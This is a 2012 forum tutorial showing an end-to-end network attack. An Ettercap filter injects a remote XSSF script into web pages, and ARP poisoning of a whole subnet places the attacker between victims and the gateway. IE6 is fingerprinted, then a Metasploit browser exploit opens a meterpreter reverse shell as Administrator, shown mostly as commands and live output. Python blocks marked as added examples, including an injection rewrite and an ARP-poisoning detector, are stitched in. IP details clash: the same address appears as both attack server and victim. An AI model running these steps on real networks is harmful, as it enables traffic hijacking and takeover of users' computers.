Xssf and Arp
Posted on 2012-9-11 23:25:18
Preface

To counter the endless stream of network threats, the market has produced plenty of software products and the experts have handed out plenty of advice. These products and recommendations give users a false sense of security while browsing, but they do nothing about application-layer vulnerabilities. The web browser is integrated into the system and depends on shared base components; the relationship between IE and Windows is the obvious example, and it amplifies the browser's security risk, leaving weaknesses that attackers are happy to exploit.

Web technology lacks diversity. IE dominates desktop browsers. Browser homogeneity may be good for compatibility, but it is bad for security: a single browser flaw directly affects a huge number of users. Once an attacker exploits a browser vulnerability, and given that most corporate networks protect themselves with little more than a username and password, the enterprise network faces disaster.

Plain attack methods no longer satisfy a pentester's needs. We need something off the beaten path.

Set up your XSSF

XSSF gives the most flexible attack delivery; I chose Metasploit because it carries the widest range of attack modules (see reference 1).

    msf > load xssf
    [-] Your Ruby version is 1.9.2. Make sure your version is up-to-date with the last non-vulnerable version before using XSSF!

     ____  ____   ______    ______   ________
    |_  _||_  _|.' ____ \ .' ____ \ |_   __  |
      \ \  / /  | (___ \_|| (___ \_|  | |_ \_|
       > `' <    _.____`.  _.____`.   |  _|
     _/ /'`\ \_ | \____) || \____) | _| |_
    |____||____| \______.' \______.'|_____| Cross-Site Scripting Framework 2.1
                                              Ludovic Courgnaud - CONIX Security

    [+] Please use command 'xssf_urls' to see useful XSSF URLs
    [*] Successfully loaded plugin: xssf
    msf > xssf_urls
    [+] XSSF Server      : 'http://222.219.171.92:8888/'        or 'http://:8888/'
    [+] Generic XSS injection: 'http://222.219.171.92:8888/loop'     or 'http://:8888/loop'
    [+] XSSF test page   : 'http://222.219.171.92:8888/test.html' or 'http://:8888/test.html'

    [+] XSSF Tunnel Proxy    : 'localhost:8889'
    [+] XSSF logs page  : 'http://localhost:8889/gui.html?guipage=main'
    [+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
    [+] XSSF help page  : 'http://localhost:8889/gui.html?guipage=help'
    msf >
Write your Ettercap filter (see reference 2). Gurus, please don't mess with my IP...
    # Request side: rename Accept-Encoding so the server answers uncompressed
    # and the HTML can be pattern-matched below. The replacement has the same
    # length as the original, so the request segment does not need resizing.
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
        }
    }
    # Response side: inject the script tag pointing at the XSSF server.
    # The forum's HTML rendering swallowed the tags the original filter
    # matched on; </head> and </body> are assumed here.
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "</head>")) {
            replace("</head>", "<script type=\"text/javascript\" src=\"http://222.219.171.92:8888/1.js\"></script></head>");
            msg("Codice iniettatto...\n");
        }
        if (search(DATA.data, "</body>")) {
            replace("</body>", "<script type=\"text/javascript\" src=\"http://222.219.171.92:8888/1.js\"></script></body>");
            msg("Codice iniettatto...\n");
        }
    }
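The filter above does two things: it neutralises Accept-Encoding on the way out so the server cannot gzip the page, and it grows the HTML coming back by a script tag. The Python below is an added example (not from the post, and not Ettercap code) that models both halves on constructed request/response bytes so the logic can be read and tested offline. The host name `xssf.example` and the sample traffic are made up; the one thing it does that the raw etterfilter `replace()` does not is fix Content-Length after the body grows.

```python
import re

# Constructed sample traffic for this example, not a capture from the post:
# a plaintext HTTP request and the server's HTML response.
SAMPLE_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    b"\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 44\r\n"
    b"\r\n"
    b"<html><head></head><body>hello</body></html>"
)

# Hypothetical injection URL standing in for the post's XSSF host.
INJECT_URL = "http://xssf.example:8888/loop"


def strip_accept_encoding(request: bytes) -> bytes:
    """Request half of the filter (tcp.dst == 80): remove Accept-Encoding so
    the server answers uncompressed and the response can be pattern-matched.
    The etterfilter version renames the header to 'Accept-Nothing!' instead,
    which keeps the segment length unchanged; dropping the line is equivalent
    once we are free to resize the request."""
    head, sep, body = request.partition(b"\r\n\r\n")
    kept = [line for line in head.split(b"\r\n")
            if not line.lower().startswith(b"accept-encoding:")]
    return b"\r\n".join(kept) + sep + body


def inject_script(response: bytes, url: str) -> bytes:
    """Response half of the filter (tcp.src == 80): insert a <script src>
    before </body> of HTML responses only. Unlike etterfilter replace(), which
    rewrites the TCP payload and leaves the HTTP headers alone, this also
    updates Content-Length; otherwise the browser may stop reading at the old
    length and never parse the injected tag."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep or b"text/html" not in head.lower() or b"</body>" not in body:
        return response
    tag = ('<script type="text/javascript" src="%s"></script>' % url).encode()
    new_body = body.replace(b"</body>", tag + b"</body>", 1)
    new_head = re.sub(rb"(?im)^Content-Length:[ \t]*\d+",
                      b"Content-Length: %d" % len(new_body), head)
    return new_head + sep + new_body


def filter_segment(payload: bytes, src_port: int, dst_port: int) -> bytes:
    """Dispatch one TCP payload the way the two if-blocks of the filter do."""
    if dst_port == 80:
        return strip_accept_encoding(payload)
    if src_port == 80:
        return inject_script(payload, INJECT_URL)
    return payload
```

Only `text/html` responses are touched; injecting into images or scripts would corrupt them without ever being parsed as HTML, which is also why a production MITM filter keys on Content-Type rather than on port alone.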
Compile the filter, then start ARP poisoning
    root@Dis9Team:/tmp# nano xss
    root@Dis9Team:/tmp# etterfilter xss -o xss.ef

    etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    12 protocol tables loaded:
         DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

    11 constants loaded:
         VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

    Parsing source file 'xss'  done.

    Unfolding the meta-tree  done.

    Converting labels to real offsets  done.

    Writing output to 'xss.ef'  done.

    -> Script encoded into 20 instructions.
    root@Dis9Team:/tmp# ettercap -T -q -i vmnet8 -F xss.ef -M ARP // // -P autoadd
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    Content filters loaded from xss.ef...
    Listening on vmnet8... (Ethernet)

    vmnet8 -> 00:50:56:C0:00:08           5.5.5.1     255.255.255.0

    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...

      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services

    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %

    1 hosts added to the hosts list...

    ARP poisoning victims:

    GROUP 1 : ANY (all the hosts in the list)

    GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...

    Text only Interface activated...
    Hit 'h' for inline help

    Activating autoadd plugin...
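With `-M ARP // //` ettercap poisons every host in the list in both directions, so from the wire's point of view one MAC (the vmnet8 interface in the banner) starts answering for the gateway and for every victim. The detector below is an added example, not part of the post or of ettercap; it walks a constructed list of ARP replies and flags the two symptoms that produces. The gateway/victim MACs are made up, and the attacker MAC is simply the one the banner printed.

```python
from collections import defaultdict

# Constructed ARP replies (sender IP, sender MAC) in arrival order; not a
# capture from the post. The attacker MAC is the vmnet8 interface the
# ettercap banner printed; the other two MACs are made up.
SAMPLE_ARP_REPLIES = [
    ("5.5.5.2",   "00:0c:29:aa:bb:01"),  # gateway answering for itself
    ("5.5.5.129", "00:0c:29:aa:bb:02"),  # victim answering for itself
    ("5.5.5.2",   "00:50:56:C0:00:08"),  # attacker now claims the gateway IP
    ("5.5.5.129", "00:50:56:C0:00:08"),  # attacker also claims the victim IP
    ("5.5.5.2",   "00:50:56:C0:00:08"),  # periodic re-poisoning, nothing new
]


def detect_arp_poisoning(replies, trusted=None):
    """Walk ARP replies and return alert strings for two symptoms of
    'ettercap -M ARP // //': an IP whose MAC changes, and one MAC that ends up
    claiming several IPs (the attacker impersonates the gateway and every
    victim at once). 'trusted' is an optional {ip: mac} baseline, e.g. from a
    DHCP lease table, so a poisoned first sighting is caught too; without it
    the first reply for an IP is taken as truth, the usual weakness of purely
    passive detectors."""
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append(f"MAC change for {ip}: {prev} -> {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(
                    f"{mac} claims multiple IPs: {sorted(mac_to_ips[mac])}")
    return alerts
```

A legitimate DHCP re-lease also changes an IP's MAC, so on a real segment the first rule needs the baseline to come from the DHCP server or switch tables; the second rule (one MAC for the gateway plus several hosts) has far fewer benign explanations.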
Test from the target machine: when the target browses a site on port 80 and the page contains the tag the filter matches on, Ettercap hijacks the response and injects our XSS URL.

Exploiting the browser: pick the exploit that matches the victim's browser version.
    msf > xssf_victims

    Victims
    =======

    id  xssf_server_id  active  ip              interval  browser_name       browser_version  cookie
    --  --------------  ------  --              --------  ------------       ---------------  ------
    1   1               true    222.219.171.92  5         Internet Explorer  6.0              YES

    [*] Use xssf_information [VictimID] to see more information about a victim
    msf > xssf_information 1

    INFORMATION ABOUT VICTIM 1
    ============================
    IP ADDRESS         : 222.219.171.92
    ACTIVE ?           : TRUE
    FIRST REQUEST      : 2012-03-07 16:39:56 UTC
    LAST REQUEST       : 2012-03-07 16:40:06 UTC
    CONNECTION TIME    : 0hr 0min 10sec
    BROWSER NAME       : Internet Explorer
    BROWSER VERSION    : 6.0
    OS NAME            : Windows
    OS VERSION         : XP
    ARCHITECTURE       : ARCH_X86
    LOCATION           : http://222.219.171.92:8888
    XSSF COOKIE ?      : YES
    RUNNING ATTACK     : NONE
    WAITING ATTACKS    : 0
    msf >
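The browser_name / browser_version / OS fields in the victim table are what the rest of the post keys the exploit choice on. As an added example (not XSSF's own parser, and not code from the post), here is the minimal User-Agent fingerprinting that yields those four fields, plus the gate check a practitioner would apply before firing a module at a victim. The User-Agent strings are constructed for the example.

```python
import re

# Constructed User-Agent strings for this example (not from the post).
UA_IE6_XP = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
UA_IE8_WIN7 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
UA_FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"

# Windows NT kernel version -> marketing name, for the classic IE UA strings.
WINDOWS_NT_NAMES = {"5.0": "2000", "5.1": "XP", "5.2": "XP x64 / Server 2003",
                    "6.0": "Vista", "6.1": "7"}


def fingerprint(user_agent):
    """Return (browser_name, browser_version, os_name, os_version), the four
    fields xssf_victims / xssf_information display, from the User-Agent alone.
    Illustrative re-implementation, not XSSF's own parser."""
    browser, version = "Unknown", None
    m = re.search(r"MSIE (\d+(?:\.\d+)?)", user_agent)
    if m:
        browser, version = "Internet Explorer", m.group(1)
    else:
        m = re.search(r"(Firefox|Chrome)/(\d+(?:\.\d+)?)", user_agent)
        if m:
            browser, version = m.group(1), m.group(2)
    os_name, os_version = "Unknown", None
    m = re.search(r"Windows NT (\d+\.\d+)", user_agent)
    if m:
        os_name = "Windows"
        os_version = WINDOWS_NT_NAMES.get(m.group(1), "NT " + m.group(1))
    elif "Linux" in user_agent:
        os_name = "Linux"
    return browser, version, os_name, os_version


def matches_target(fp, browser="Internet Explorer", major=6, os_name="Windows"):
    """Gate a module on the fingerprint: the check the post does by eye before
    choosing ms10_018_ie_behaviors (XSSF target 'IE 6 SP0-SP2'). The IE
    service pack is not stated in the User-Agent (the SV1 token only marks
    XP SP2), so the SP range is left to the exploit's own target detection."""
    name, version, os_, _ = fp
    if name != browser or os_ != os_name or version is None:
        return False
    return int(version.split(".")[0]) == major
```

Browser-side checks such as the ones XSSF runs via JavaScript can refine this (the User-Agent is trivially spoofed), but for choosing which module to queue, the header is what the victim table is built from.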
From the above, the target is Windows XP with IE6.
Search for IE6
    msf > search ie6

    Matching Modules
    ================

       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       auxiliary/xssf/public/old_browsers/bypass_sop_ie6                           normal   SOP Bypass
       exploit/windows/browser/adobe_flashplayer_avm              2011-03-15       good     Adobe Flash Player AVM Bytecode Verification Vulnerability
       exploit/windows/browser/hp_loadrunner_addfile              2008-01-25       normal   Persits XUpload ActiveX AddFile Buffer Overflow
       exploit/windows/browser/hp_loadrunner_addfolder            2007-12-25       good     HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
       exploit/windows/browser/ms06_013_createtextrange           2006-03-19       normal   Internet Explorer createTextRange() Code Execution
       exploit/windows/browser/ms06_071_xml_core                  2006-10-10       normal   Internet Explorer XML Core Services HTTP Request Handling
       exploit/windows/browser/ms07_017_ani_loadimage_chunksize   2007-03-28       great    Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
       exploit/windows/browser/ms09_043_owc_htmlurl               2009-08-11       normal   Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
       exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
       exploit/windows/browser/nctaudiofile2_setformatlikesample  2007-01-24       normal   NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
       exploit/windows/browser/realplayer_qcp                     2011-08-16       average  RealNetworks Realplayer QCP Parsing Heap Overflow
       exploit/windows/browser/teechart_pro                       2011-08-11       normal   TeeChart Professional ActiveX Control
Plenty of them. Let's pick one with Rank "good".
    exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
Use this one
    msf > use exploit/windows/browser/ms10_018_ie_behaviors
    msf  exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf  exploit(ms10_018_ie_behaviors) > set LHOST 5.5.5.1
    LHOST => 5.5.5.1
    msf  exploit(ms10_018_ie_behaviors) > exploit
    [*] Exploit running as background job.

    [*] Started reverse handler on 5.5.5.1:4444
    [*] Using URL: http://0.0.0.0:8080/l13ec55pR44
    [*]  Local IP: http://222.219.171.92:8080/l13ec55pR44
    msf  exploit(ms10_018_ie_behaviors) >
    [*] Server started.

    msf  exploit(ms10_018_ie_behaviors) > jobs

    Jobs
    ====

      Id  Name
      --  ----
      0   Exploit: windows/browser/ms10_018_ie_behaviors

    msf  exploit(ms10_018_ie_behaviors) >
Run the exploit against the victim (victim id 1, job id 0)
    msf  exploit(ms10_018_ie_behaviors) > xssf_exploit 1 0
    [*] Searching Metasploit launched module with JobID = '0'...
    [+] A running exploit exists: 'Exploit: windows/browser/ms10_018_ie_behaviors'
    [*] Exploit execution started, press [CTRL + C] to stop it !

    [+] Remaining victims to attack: [1 (1)]

    [*] Sending Internet Explorer DHTML Behaviors Use After Free to 222.219.171.92:48378 (target: IE 6 SP0-SP2 (onclick))...

    [+] Code 'Exploit: windows/browser/ms10_018_ie_behaviors' sent to victim '1'
    [+] Remaining victims to attack: NONE
    [*] Sending Internet Explorer DHTML Behaviors Use After Free to 222.219.171.92:44503 (target: IE 6 SP0-SP2 (onclick))...
    [*] Sending stage (752128 bytes) to 5.5.5.129
    [*] Meterpreter session 1 opened (5.5.5.1:4444 -> 5.5.5.129:1343) at 2012-03-07 16:45:18 +0800
    [*] Session ID 1 (5.5.5.1:4444 -> 5.5.5.129:1343) processing InitialAutoRunScript 'migrate -f'
    [*] Current server process: iexplore.exe (3436)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 3332
    [+] Successfully migrated to process

    msf  exploit(ms10_018_ie_behaviors) > sessions

    Active sessions
    ===============

      Id  Type                   Information                                      Connection
      --  ----                   -----------                                      ----------
      1   meterpreter x86/win32  DIS9TEAM-612ADE\Administrator @ DIS9TEAM-612ADE  5.5.5.1:4444 -> 5.5.5.129:1343 (5.5.5.129)

    msf  exploit(ms10_018_ie_behaviors) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > getuid
    Server username: DIS9TEAM-612ADE\Administrator
    meterpreter >



